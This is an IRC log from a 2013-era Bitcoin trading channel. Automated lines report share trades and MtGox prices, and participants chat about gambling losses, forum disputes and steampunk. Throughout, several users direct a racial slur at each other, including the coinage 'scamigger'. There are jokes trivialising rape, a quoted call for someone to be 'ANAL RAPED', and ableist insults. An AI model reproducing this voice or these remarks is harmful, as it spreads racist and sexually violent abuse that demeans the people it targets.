03:05:51 [BTCTC] [TAT.ASICMINER] 17 @ 0.04603 = 0.7825 BTC [+] Jul 04 03:06:27 Any news on Havelock and why they're down? Jul 04 03:06:47 ddos Jul 04 03:06:53 [BTCTC] [ASICMINER-PT] 1 @ 4.562009 BTC [+] Jul 04 03:06:55 [BTCTC] [TAT.ASICMINER] 28 @ 0.04603 = 1.2888 BTC [+] Jul 04 03:06:58 [BTCTC] [ASICMINER-PT] 2 @ 4.561 = 9.122 BTC [-] Jul 04 03:07:03 http://imgur.com/5MC3ZIo Jul 04 03:07:05 imgur: the simple image sharer Jul 04 03:07:12 look at that Jul 04 03:07:20 MattFoster just lost 300BTC Jul 04 03:07:26 [BTCTC] [TAT.ASICMINER] 50 @ 0.046001 = 2.3001 BTC [-] Jul 04 03:07:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [-] Jul 04 03:07:29 200 Jul 04 03:07:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.046 = 0.46 BTC [-] Jul 04 03:07:31 [BTCTC] [TAT.ASICMINER] 20 @ 0.045001 = 0.9 BTC [-] Jul 04 03:07:35 dub i thought you weren't black Jul 04 03:07:37 just dice Jul 04 03:08:03 [MPEX] [S.DICE] 814 @ 0.00205502 = 1.6728 BTC [-] Jul 04 03:08:15 [MPEX] [S.DICE] 250 @ 0.00205501 = 0.5138 BTC [-] Jul 04 03:08:16 [MPEX] [S.DICE] 400 @ 0.00205 = 0.82 BTC [-] Jul 04 03:08:32 just fyi, i'm putting tib back on ignore Jul 04 03:08:41 mircea_popescu: I thought you didn't need to be black to be a nigger? Jul 04 03:08:42 [MPEX] [S.DICE] 100 @ 0.00200003 = 0.2 BTC [-] Jul 04 03:08:43 [MPEX] [S.DICE] 1500 @ 0.00200002 = 3 BTC [-] Jul 04 03:08:46 [MPEX] [S.DICE] 500 @ 0.00200001 = 1 BTC [-] Jul 04 03:08:50 [MPEX] [S.DICE] 6436 @ 0.002 = 12.872 BTC [-] Jul 04 03:09:00 so you're a scamigger. Jul 04 03:09:00 https://just-dice.com Jul 04 03:09:31 clown, you realise we know you've been here every day Jul 04 03:09:48 hahaha Jul 04 03:10:19 kids these days Jul 04 03:10:40 you are a disgrace to trolling Jul 04 03:11:49 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.004375 = 0.1313 BTC [+] Jul 04 03:11:51 [BTCTC] [TAT.VIRTUALMINE] 85 @ 0.004376 = 0.372 BTC [+] Jul 04 03:11:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004376 BTC [+] Jul 04 03:11:54 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004377 = 0.0219 BTC [+] Jul 04 03:11:54 [BTCTC] [TAT.VIRTUALMINE] 64 @ 0.004399 = 0.2815 BTC [+] Jul 04 03:12:23 [BTCTC] [ASICMINER-PT] 1 @ 4.558 BTC [-] Jul 04 03:12:29 [BTCTC] [DMS.SELLING] 14 @ 0.029301 = 0.4102 BTC [+] Jul 04 03:12:31 [BTCTC] [DMS.SELLING] 16 @ 0.0293 = 0.4688 BTC [-] Jul 04 03:12:48 [BTCTC] [TAT.ASICMINER] 21 @ 0.046002 = 0.966 BTC [+] Jul 04 03:12:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [-] Jul 04 03:12:54 [BTCTC] [TAT.ASICMINER] 19 @ 0.045 = 0.855 BTC [-] Jul 04 03:12:55 [BTCTC] [TAT.ASICMINER] 21 @ 0.045 = 0.945 BTC [-] Jul 04 03:13:24 [BTCTC] [AMC-PT] 1403 @ 0.00224 = 3.1427 BTC [+] Jul 04 03:13:49 [BTCTC] [AMC-PT] 100 @ 0.00225 = 0.225 BTC [+] Jul 04 03:13:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [-] Jul 04 03:14:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [-] Jul 04 03:14:17 [BTCTC] [AMC-PT] 10 @ 0.002275 = 0.0228 BTC [+] Jul 04 03:14:32 [BTCTC] [ASICMINER-PT] 1 @ 4.5301 BTC [-] Jul 04 03:14:37 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 04 03:14:42 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [-] Jul 04 03:14:47 [BTCTC] [ASICMINER-PT] 3 @ 4.47 = 13.41 BTC [-] Jul 04 03:14:49 [BTCTC] [AMC-PT] 1500 @ 0.0023 = 3.45 BTC [+] Jul 04 03:16:04 [BTCTC] [ASICMINER-PT] 1 @ 4.400002 BTC [-] Jul 04 03:16:09 [BTCTC] [AMC-PT] 11 @ 0.002311 = 0.0254 BTC [+] Jul 04 03:16:11 [BTCTC] [AMC-PT] 100 @ 0.002311 = 0.2311 BTC [+] Jul 04 03:16:12 [BTCTC] [AMC-PT] 91 @ 0.002311 = 0.2103 BTC [+] Jul 04 03:16:24 mining bubble liquidation too Jul 04 03:16:47 [BTCTC] [ASICMINER-PT] 1 @ 4.400002 BTC [-] Jul 04 03:16:53 [BTCTC] [ASICMINER-PT] 1 @ 4.400001 BTC [-] Jul 04 03:17:00 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [-] Jul 04 03:21:34 [BTCTC] [ASICMINER-PT] 15 @ 4.4 = 66 BTC [-] Jul 04 03:21:41 [BTCTC] [ASICMINER-PT] 3 @ 4.4 = 13.2 BTC [-] Jul 04 03:21:53 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [-] Jul 04 03:22:01 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [-] Jul 04 03:22:12 [BTCTC] [ASICMINER-PT] 1 @ 4.37 BTC [-] Jul 04 03:22:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.045 = 0.27 BTC [-] Jul 04 03:23:00 [BTCTC] [AMC-PT] 409 @ 0.002311 = 0.9452 BTC [+] Jul 04 03:23:02 [BTCTC] [AMC-PT] 100 @ 0.00234 = 0.234 BTC [+] Jul 04 03:23:02 [BTCTC] [AMC-PT] 5 @ 0.002389 = 0.0119 BTC [+] Jul 04 03:23:03 [BTCTC] [AMC-PT] 18 @ 0.00239 = 0.043 BTC [+] Jul 04 03:24:08 [BTCTC] [BITVPS] 3 @ 0.002998 = 0.009 BTC [+] Jul 04 03:26:45 [BTCTC] [TAT.ASICMINER] 26 @ 0.046499 = 1.209 BTC [+] Jul 04 03:28:11 Pa. mom settles poppy seed bagel drug test case Jul 04 03:29:36 [BTCTC] [DMS.PURCHASE] 50 @ 0.048 = 2.4 BTC [-] Jul 04 03:30:27 [BTCTC] [ASICMINER-PT] 2 @ 4.32 = 8.64 BTC [-] Jul 04 03:30:36 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 04 03:31:11 [BTCTC] [ASICMINER-PT] 1 @ 4.599996 BTC [+] Jul 04 03:31:28 [BTCTC] [ASICMINER-PT] 1 @ 4.299999 BTC [-] Jul 04 03:31:41 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [-] Jul 04 03:31:48 [BTCTC] [ASICMINER-PT] 10 @ 4.29 = 42.9 BTC [-] Jul 04 03:32:00 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [-] Jul 04 03:32:10 [BTCTC] [TAT.ASICMINER] 24 @ 0.045001 = 1.08 BTC [-] Jul 04 03:32:21 [BTCTC] [TAT.ASICMINER] 7 @ 0.045 = 0.315 BTC [-] Jul 04 03:32:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [-] Jul 04 03:32:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.04461 BTC [-] Jul 04 03:32:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.044601 BTC [-] Jul 04 03:32:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.0445 = 0.534 BTC [-] Jul 04 03:32:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.0445 = 0.089 BTC [-] Jul 04 03:32:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0444 BTC [-] Jul 04 03:32:33 [BTCTC] [S.MPOE-PT] 2 @ 0.000992 = 0.002 BTC [+] Jul 04 03:32:34 [BTCTC] [TAT.ASICMINER] 15 @ 0.0444 = 0.666 BTC [-] Jul 04 03:32:36 [BTCTC] [TAT.ASICMINER] 51 @ 0.044 = 2.244 BTC [-] Jul 04 03:33:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [+] Jul 04 03:33:42 [BTCTC] [TAT.ASICMINER] 24 @ 0.044 = 1.056 BTC [-] Jul 04 03:33:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [-] Jul 04 03:36:46 [BTCTC] [ASICMINER-PT] 2 @ 4.284 = 8.568 BTC [-] Jul 04 03:37:38 [BTCTC] [ASICMINER-PT] 1 @ 4.27 BTC [-] Jul 04 03:38:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.0435 BTC [-] Jul 04 03:38:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.0435 = 0.2175 BTC [-] Jul 04 03:38:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0435 BTC [-] Jul 04 03:38:40 [BTCTC] [TAT.ASICMINER] 8 @ 0.043017 = 0.3441 BTC [-] Jul 04 03:39:04 [BTCTC] [TAT.ASICMINER] 30 @ 0.043016 = 1.2905 BTC [-] Jul 04 03:39:10 [BTCTC] [TAT.ASICMINER] 75 @ 0.043015 = 3.2261 BTC [-] Jul 04 03:39:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.04301 = 0.8602 BTC [-] Jul 04 03:39:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.043 = 0.215 BTC [-] Jul 04 03:39:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.043 = 0.172 BTC [-] Jul 04 03:40:14 [BTCTC] [TAT.ASICMINER] 8 @ 0.042601 = 0.3408 BTC [-] Jul 04 03:41:28 MattFoster just lost another 150BTC on JustDice Jul 04 03:41:45 his entire gambling stash is gone Jul 04 03:42:32 nice Jul 04 03:42:42 ;;ticker Jul 04 03:42:43 MtGox BTCUSD ticker | Best bid: 79.79998, Best ask: 79.87999, Bid-ask spread: 0.08001, Last trade: 79.87999, 24 hour volume: 73294.28463739, 24 hour low: 76.00000, 24 hour high: 90.90000, 24 hour vwap: 83.08633 Jul 04 03:42:53 wait for the bounce and cash out slowly Jul 04 03:43:01 no big deal Jul 04 03:45:00 [MPEX] [S.MPOE] 900 @ 0.00077632 = 0.6987 BTC [+] Jul 04 03:46:54 [BTCTC] [ASICMINER-PT] 1 @ 4.270001 BTC [+] Jul 04 03:47:00 [BTCTC] [ASICMINER-PT] 4 @ 4.270001 = 17.08 BTC [+] Jul 04 03:49:37 [BTCTC] [COGNITIVE] 5 @ 0.322001 = 1.61 BTC [-] Jul 04 03:49:39 [BTCTC] [COGNITIVE] 5 @ 0.322 = 1.61 BTC [-] Jul 04 03:50:44 [BTCTC] [RSM] 1 @ 0.016 BTC [-] Jul 04 03:52:42 [BTCTC] [AMC-PT] 12 @ 0.0024 = 0.0288 BTC [+] Jul 04 03:52:59 [BTCTC] [RSM] 8 @ 0.01502 = 0.1202 BTC [-] Jul 04 03:54:49 [BTCTC] [RSM] 1 @ 0.0145 BTC [-] Jul 04 03:55:54 [MPEX] [O.USD.C080T] 50 @ 0.34004606 = 17.0023 BTC [-] Jul 04 03:56:13 [BTCTC] [AMC-PT] 8 @ 0.0024 = 0.0192 BTC [+] Jul 04 03:57:44 [BTCTC] [AMC-PT] 1 @ 0.0024 BTC [+] Jul 04 03:58:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.045 = 2.25 BTC [+] Jul 04 04:01:14 [BTCTC] [BASIC-MINING] 4 @ 0.166401 = 0.6656 BTC [-] Jul 04 04:02:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.045995 = 0.092 BTC [+] Jul 04 04:03:37 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 04 04:03:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.045995 BTC [+] Jul 04 04:06:52 [BTCTC] [ASICMINER-PT] 1 @ 4.32 BTC [-] Jul 04 04:06:58 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [-] Jul 04 04:16:09 [BTCTC] [TAT.ASICMINER] 39 @ 0.045 = 1.755 BTC [-] Jul 04 04:20:14 [BTCTC] [ASICMINER-PT] 1 @ 4.467987 BTC [+] Jul 04 04:20:56 [BTCTC] [ASICMINER-PT] 1 @ 4.467986 BTC [-] Jul 04 04:22:37 [BTCTC] [ASICMINER-PT] 1 @ 4.467984 BTC [-] Jul 04 04:23:08 [BTCTC] [S.DICE-PT] 51 @ 0.002348 = 0.1197 BTC [+] Jul 04 04:23:10 [BTCTC] [S.DICE-PT] 84 @ 0.002348 = 0.1972 BTC [+] Jul 04 04:23:30 [BTCTC] [ASICMINER-PT] 5 @ 4.467983 = 22.3399 BTC [-] Jul 04 04:23:36 [BTCTC] [ASICMINER-PT] 1 @ 4.468 BTC [+] Jul 04 04:23:43 [BTCTC] [ASICMINER-PT] 1 @ 4.47 BTC [+] Jul 04 04:25:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.0431 = 0.0862 BTC [-] Jul 04 04:25:45 [BTCTC] [TAT.ASICMINER] 20 @ 0.043 = 0.86 BTC [-] Jul 04 04:25:46 [BTCTC] [TAT.ASICMINER] 64 @ 0.043 = 2.752 BTC [-] Jul 04 04:27:12 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [+] Jul 04 04:27:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.044899 = 0.449 BTC [+] Jul 04 04:28:15 [BTCTC] [ASICMINER-PT] 4 @ 4.599975 = 18.3999 BTC [+] Jul 04 04:28:22 [BTCTC] [ASICMINER-PT] 5 @ 4.6 = 23 BTC [+] Jul 04 04:29:11 [BTCTC] [TAT.ASICMINER] 40 @ 0.044899 = 1.796 BTC [+] Jul 04 04:29:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.0449 = 0.449 BTC [+] Jul 04 04:30:33 [MPEX] [S.MPOE] 3403 @ 0.00077573 = 2.6398 BTC [-] Jul 04 04:33:25 [BTCTC] [ASICMINER-PT] 4 @ 4.330125 = 17.3205 BTC [-] Jul 04 04:33:29 [BTCTC] [ASICMINER-PT] 1 @ 4.330123 BTC [-] Jul 04 04:37:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.044899 BTC [-] Jul 04 04:38:29 [BTCTC] [BFMINES] 16 @ 0.004 = 0.064 BTC Jul 04 04:38:55 "Great idea and can't get shut down! But this may make the government sieze individual accounts. Taking a cash deposit directly would make us money transmitters. But I'll be using it with a bank I don't use." Jul 04 04:39:01 the perfect logic. Jul 04 04:39:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.043102 = 0.1293 BTC [-] Jul 04 04:39:16 if only people knew about this method before stds were invented. Jul 04 04:39:24 [BTCTC] [ASICMINER-PT] 1 @ 4.48 BTC [+] Jul 04 04:39:27 [20:22] --- Irssi: Starting query in freenode with tiberiusxvi Jul 04 04:39:28 [20:22] dont fking msg me Jul 04 04:39:28 they could go to bed with a girl they don't have sex with and all'd be dandy. Jul 04 04:39:28 [21:31] --- tiberiusxvi has quit [Quit: 7/3/2013 End of Bitcoin] Jul 04 04:39:29 [BTCTC] [ASICMINER-PT] 5 @ 4.47 = 22.35 BTC [-] Jul 04 04:39:40 dude is actually schizo Jul 04 04:40:36 mircea_popescu: can't catch aids that you didnt catch after all Jul 04 04:40:45 ikr? Jul 04 04:41:35 https://bitcointalk.org/index.php?topic=245713.msg2649682#msg2649682 Jul 04 04:41:38 fresh shitpile. Jul 04 04:41:42 The coming flash crash in AMC Jul 04 04:42:11 the inexistant vmc and the amc thingee will now merge. Jul 04 04:44:42 heh priceless convo in -anal Jul 04 04:45:10 " Don not trade with Invest0r , just a child that needs to get BUTT FUCKED and ANAL RAPED" Jul 04 04:45:13 does it beat th eforum ? Jul 04 04:45:39 might be the same person Jul 04 04:46:22 [20:17] hey Mannn, from your experience, whats the minimum one should trade to see some sort of profit from a change of 90.3 to 91 Jul 04 04:46:25 [20:20] how much would you profit from a half bitcoin gain with trading 150btc? Jul 04 04:46:45 [20:31] my partner runs a currency exchange and I told him I'd learn everything I Jul 04 04:46:48 can about bit coin and help him/his business get into it. He's registered, Jul 04 04:46:51 etc. so now all thats left it to figure out what the hell is the best Jul 04 04:46:54 thing to do with bitcoin Jul 04 04:47:05 [20:32] im not, not a currncy exchange... an ecurrency Jul 04 04:47:11 [BTCTC] [DMS.MINING] 12 @ 0.02 = 0.24 BTC [-] Jul 04 04:47:29 sigh Jul 04 04:49:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.044899 = 0.0898 BTC [+] Jul 04 04:50:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004399 BTC [+] Jul 04 04:51:07 mircea how's the game looking? just curious. Jul 04 04:51:26 like what's it look like not how's it coming along Jul 04 04:51:47 [BTCTC] [AMC-PT] 1 @ 0.00235 BTC [-] Jul 04 04:51:50 it looks likeminecraft still Jul 04 04:52:09 http://www.vice.com/en_ca/read/should-trans-people-have-to-disclose-their-birth-gender-before-sex Jul 04 04:52:12 Should Trans People Have to Disclose Their Birth Gender Before Sex? | VICE Canada Jul 04 04:54:18 by now we know it's tibby on the form of address. Jul 04 04:54:24 have you checked the forum comments ? Jul 04 04:54:37 bah. i mean the blog comments. Jul 04 04:55:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.045995 = 0.138 BTC [+] Jul 04 04:56:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.045996 = 0.092 BTC [+] Jul 04 05:00:04 about that blog - I guess I just asked for credits, but don't know where to send money Jul 04 05:00:43 hot damn 4th Jul 04 05:00:56 [BTCTC] [AMC-PT] 49 @ 0.00235 = 0.1152 BTC [-] Jul 04 05:00:57 [BTCTC] [AMC-PT] 79 @ 0.0024 = 0.1896 BTC [+] Jul 04 05:00:58 [BTCTC] [AMC-PT] 372 @ 0.0024 = 0.8928 BTC [+] Jul 04 05:01:50 For your consideration: http://coin.furuknap.net/comparing-bfmines-to-alternatives/ <- Overview of mining investments on BTCT Jul 04 05:01:52 you don't need credits to read comments. Jul 04 05:02:30 is VMC for real Jul 04 05:02:36 nop Jul 04 05:03:33 cuz they fuckin with my emotions, smokey Jul 04 05:04:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.045996 = 0.092 BTC [+] Jul 04 05:04:20 [BTCTC] [TAT.ASICMINER] 8 @ 0.045996 = 0.368 BTC [+] Jul 04 05:05:21 that's like playing with my money. Jul 04 05:06:07 well..thats what they be doin deadweasel. VMC straight up murkin Jul 04 05:07:07 Steve TheSnake doesnt believe in one night stands, he's better than that Jul 04 05:07:16 whats the snake for then stevie Jul 04 05:07:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.045996 = 0.138 BTC [+] Jul 04 05:09:51 [BTCTC] [ASICMINER-PT] 6 @ 4.470013 = 26.8201 BTC [+] Jul 04 05:09:56 [BTCTC] [ASICMINER-PT] 1 @ 4.470009 BTC [-] Jul 04 05:10:02 [BTCTC] [ASICMINER-PT] 1 @ 4.47 BTC [-] Jul 04 05:10:10 https://twitter.com/KimDotcom/status/352602275992174592 Jul 04 05:10:13 Twitter / KimDotcom: New Zealand is a beauty!!! ... Jul 04 05:10:22 look at that retarded 4chan fuckwit Jul 04 05:11:53 http://www.news4jax.com/news/police-sex-offender-hanging-around-courthouse/-/475880/20830722/-/njm9l2z/-/index.html Jul 04 05:11:55 Police: Sex offender lurking around courthouse | News - Home Jul 04 05:12:07 what do u guys think about this Jul 04 05:12:51 fucking outrageous Jul 04 05:13:00 it's like pick on the nigger, except by a different criteria. Jul 04 05:13:09 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 04 05:13:21 the newscast i just saw was even worse Jul 04 05:13:31 thats not too far from where i live..kinda..maybe 200 miles Jul 04 05:13:36 not online yet i guess Jul 04 05:13:38 i'm scared now. Jul 04 05:13:43 sigh. Jul 04 05:13:50 isnt this illegal? Jul 04 05:13:52 but then again you cant rape the willing. Jul 04 05:13:55 you know, anyone can "hang around" the courthouse Jul 04 05:14:00 how the fucking hell would it be illegal Jul 04 05:14:10 the newscast Jul 04 05:14:13 o Jul 04 05:14:15 maybe he's waiting for his court date for something? Jul 04 05:14:25 [BTCTC] [ASICMINER-PT] 1 @ 4.39 BTC [-] Jul 04 05:14:32 maybe he's trying to read up on all the laws that will fuck you and "ignorance is no defense" Jul 04 05:14:40 he could well spend fiddy lifetimes doing that. Jul 04 05:14:48 this looks kind of illegal. Jul 04 05:15:04 i need to find the newscast i just saw Jul 04 05:15:15 it was fucking embarassing Jul 04 05:15:21 well i dont think you can single someone out for this..public areas are...public.. Jul 04 05:15:31 ya but he's a 2nd rate citizen Jul 04 05:15:43 his point in life is to be picked on by all the people who didn't bully kids in school. Jul 04 05:16:13 im sure it does wonders for rehabilitations. Jul 04 05:16:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.045996 = 0.092 BTC [+] Jul 04 05:17:07 the us will be going down in legal history as "that country which invented the legal device to force all rapists to murder", to which i guess we add "and every petty criminal a serial killer" Jul 04 05:17:13 <[\\\]> aww, asicminer prices are dropping Jul 04 05:17:21 <[\\\]> the div must have not been good Jul 04 05:17:27 .023 or so Jul 04 05:17:35 hm Jul 04 05:17:49 [BTCTC] [DMS.MINING] 33 @ 0.0205 = 0.6765 BTC [+] Jul 04 05:18:18 [BTCTC] [DMS.MINING] 167 @ 0.02089 = 3.4886 BTC [+] Jul 04 05:19:13 dub why do you hate the fat anyway ? Jul 04 05:19:26 hate the fat? Jul 04 05:19:48 [BTCTC] [S.BBET-PT] 10 @ 0.0018 = 0.018 BTC [-] Jul 04 05:19:56 you found some other feature on kim ? Jul 04 05:20:03 [MPEX] [S.MPOE] 5300 @ 0.00077573 = 4.1114 BTC [-] Jul 04 05:20:22 im not hating .com I'm hating the reply Jul 04 05:20:52 inbred 'hacktavist' unfollowing kim because he's not internet edgy enough anymore Jul 04 05:21:04 oh i see. gotta actually follow teh links Jul 04 05:21:08 anon is the new emo Jul 04 05:21:41 nah, emo was actually very physical by comparison Jul 04 05:22:26 i think anon might be the new steampunk Jul 04 05:25:38 [BTCTC] [AMC-PT] 3 @ 0.0023 = 0.0069 BTC [-] Jul 04 05:25:39 [BTCTC] [AMC-PT] 54 @ 0.00215 = 0.1161 BTC [-] Jul 04 05:25:40 [BTCTC] [AMC-PT] 107 @ 0.002125 = 0.2274 BTC [-] Jul 04 05:25:41 [BTCTC] [AMC-PT] 1105 @ 0.002031 = 2.2443 BTC [-] Jul 04 05:25:43 [BTCTC] [AMC-PT] 231 @ 0.00203 = 0.4689 BTC [-] Jul 04 05:27:43 http://upload.wikimedia.org/wikipedia/commons/c/ca/CarnevaleSteampunk.JPG Jul 04 05:27:46 liek. Jul 04 05:28:07 anon is the same fat friendless nerd he's always been Jul 04 05:29:17 but now online Jul 04 05:29:29 sitting in his room at moms house, desperately wanting to feel connected to something before ascending to a life of upsized combos and debt slavery Jul 04 05:30:10 so yeah, punk fits pretty well Jul 04 05:30:49 well punk not so much. but punk died, in like the 70s Jul 04 05:31:09 the reanimated corpses packed full of non pareil however... Jul 04 05:31:13 [BTCTC] [AMC-PT] 170 @ 0.00205 = 0.3485 BTC [+] Jul 04 05:31:15 [BTCTC] [AMC-PT] 25 @ 0.002031 = 0.0508 BTC [-] Jul 04 05:31:16 [BTCTC] [AMC-PT] 30 @ 0.00203 = 0.0609 BTC [-] Jul 04 05:32:20 speaking of which, how the fuck does steampunk get a better taaki than we do! Jul 04 05:32:24 http://en.wikipedia.org/wiki/G._D._Falksen check iout this idiot. Jul 04 05:32:34 "His large number of articles on the genre have garnered mainstream attention:[6] The Chap Magazine dubbed him "America's authority on the movement"[7] in one of their discussions of Steampunk, Marie Claire Italy described him as "a specialist in this field,"[8] and Papermag has called him "the unofficial face of Steampunk."[9] His opinions on the genre are frequently quoted in discussions of steampunk in a variety of Jul 04 05:32:34 publications such as CRN,[10] Bizarre Mag,[11] and local-interest sites" Jul 04 05:32:41 almost the same article! much less zittage! Jul 04 05:32:50 I thought steampunk is what hippies grew up and did Jul 04 05:33:07 s/grew up/got old Jul 04 05:33:10 i thought it's what goths grew up and did Jul 04 05:33:35 ;;ticker Jul 04 05:33:37 MtGox BTCUSD ticker | Best bid: 78.77393, Best ask: 78.99999, Bid-ask spread: 0.22606, Last trade: 79.00000, 24 hour volume: 78854.41489334, 24 hour low: 76.00000, 24 hour high: 90.79700, 24 hour vwap: 82.68572 Jul 04 05:33:51 its all teh same Jul 04 05:34:09 I'm different so I'll act really different so I can be the same Jul 04 05:35:00 steampunk is kinda what the kids that dress up but don't fuck do. Jul 04 05:35:09 i don't think it's allowed past about 17ish Jul 04 05:35:30 all the steampunks I've seen RL are 60+ hippies Jul 04 05:35:42 you think they're hippies, but they're more likely pedos Jul 04 05:35:43 their leader does kind look like he should be carrying a tuba Jul 04 05:36:09 i'm publishing this. Jul 04 05:36:32 [BTCTC] [AMC-PT] 165 @ 0.00216 = 0.3564 BTC [+] Jul 04 05:37:14 [BTCTC] [AMC-PT] 758 @ 0.00216 = 1.6373 BTC [+] Jul 04 05:38:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.045996 = 0.23 BTC [+] Jul 04 05:38:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.046 = 0.46 BTC [+] Jul 04 05:40:26 [BTCTC] [PAJKA.BOND] 5 @ 0.06 = 0.3 BTC [+] Jul 04 05:41:15 the "before" picture: http://www.browneweb.com/images/SB/New%20Folder/images/90%20-%20Band%20geek.jpg Jul 04 05:42:03 I thought getting Steampunked was getting shit on or something :[ Jul 04 05:42:30 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [+] Jul 04 05:42:36 [BTCTC] [ASICMINER-PT] 1 @ 4.391 BTC [-] Jul 04 05:42:58 it's what happens after Jul 04 05:43:40 huh learned somthin new Jul 04 05:43:47 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [+] Jul 04 05:43:53 the pittsburg steampunker Jul 04 05:44:01 http://trilema.com/2013/socioaesthetic-considerations-as-well-as-lyfe-phylosophycal/ Jul 04 05:44:03 socioAesthetic considerations as well as lyfe-phylosophycal pe Trilema - Un blog de Mircea Popescu. Jul 04 05:44:05 my best tytle to date Jul 04 05:45:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.044105 = 2.2053 BTC [-] Jul 04 05:45:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.044105 BTC [-] Jul 04 05:46:23 hehe Jul 04 05:47:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.044105 BTC [-] Jul 04 05:48:13 oh this article rocks. Steampunk 101 by GD Falksen. What is steampunk? bla bla. Where does the punk come in? Ironically, it doesn’t. Jul 04 05:48:13 [BTCTC] [TAT.ASICMINER] 15 @ 0.044105 = 0.6616 BTC [-] Jul 04 05:48:26 mircea_popescu: I'm blaming you when the steampunks, goths, hippies and anonymous fucktards are coming after me Jul 04 05:48:31 totally IRONICALLY it doesn't. that's it, absolutely. anon is the new steampunk Jul 04 05:49:15 [BTCTC] [TAT.ASICMINER] 42 @ 0.044105 = 1.8524 BTC [-] Jul 04 05:49:18 cuz they can't stay anon at all? Jul 04 05:49:21 However, individuals interested in exploring a steampunk equivalent to 20th century punk can find a wealth of material in 19th century counterculture groups ranging from the Luddites to utopians to hooligans. Add a dash of Victorian street culture and a sprinkling of ragtime, and steampunk “punk” comes into focus. Jul 04 05:49:30 totally. i can see punk guys adding "dashes" of shit. Jul 04 05:49:40 like, pinky upturned and everything. Jul 04 05:49:43 [BTCTC] [TAT.ASICMINER] 28 @ 0.044105 = 1.2349 BTC [-] Jul 04 05:50:00 dub i thought you were a nigger anyway. Jul 04 05:51:01 mircea_popescu: you keep using that word but i don't think it means what you think it means Jul 04 05:51:10 totally ? Jul 04 05:51:23 you sound like a red neck on the internet when you use it Jul 04 05:51:31 i thought it's valley Jul 04 05:51:37 at least replace the er with the a Jul 04 05:51:45 [BTCTC] [AMC-PT] 500 @ 0.002299 = 1.1495 BTC [+] Jul 04 05:51:51 [BTCTC] [ASICMINER-PT] 1 @ 4.519997 BTC [+] Jul 04 05:52:02 well i'd love to troll you moar, but! Jul 04 05:52:12 mp has problems with e's and a's today Jul 04 05:52:37 Jul 04 03:03:35 a nigger that can buy and sell your broke ass Jul 04 05:52:37 mircea_popescu senator of good 'ol south carolina Jul 04 05:52:44 it's a reference you see. Jul 04 05:52:53 [BTCTC] [TAT.ASICMINER] 23 @ 0.044105 = 1.0144 BTC [-] Jul 04 05:52:55 you gots to scrawl up laddie Jul 04 05:52:55 [BTCTC] [TAT.ASICMINER] 15 @ 0.046 = 0.69 BTC [+] Jul 04 05:52:57 would you like some ribs? Jul 04 05:53:39 I forget that being a nigger equates to carrying WMDs in most places Jul 04 05:54:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.04647 = 1.1618 BTC [+] Jul 04 05:54:29 you've seen those schlongs ? Jul 04 05:54:45 errytime I look down Jul 04 05:54:48 have you ever seen Chappelle show? Jul 04 05:54:51 [BTCTC] [TAT.ASICMINER] 11 @ 0.04648 = 0.5113 BTC [+] Jul 04 05:55:00 with the black white supremecist? Jul 04 05:55:03 thestringpuller: I was telling MP he should watch that Jul 04 05:55:04 thestringpuller ocasionally. not rly my kind of thing, Jul 04 05:55:20 N-I-G Jul 04 05:55:22 G A R Jul 04 05:55:25 i'm more of a carlin/lemmon/rickles sort of guy Jul 04 05:55:26 it's the niggar family Jul 04 05:55:30 related fun fact: chappellehas a 13" cock Jul 04 05:55:36 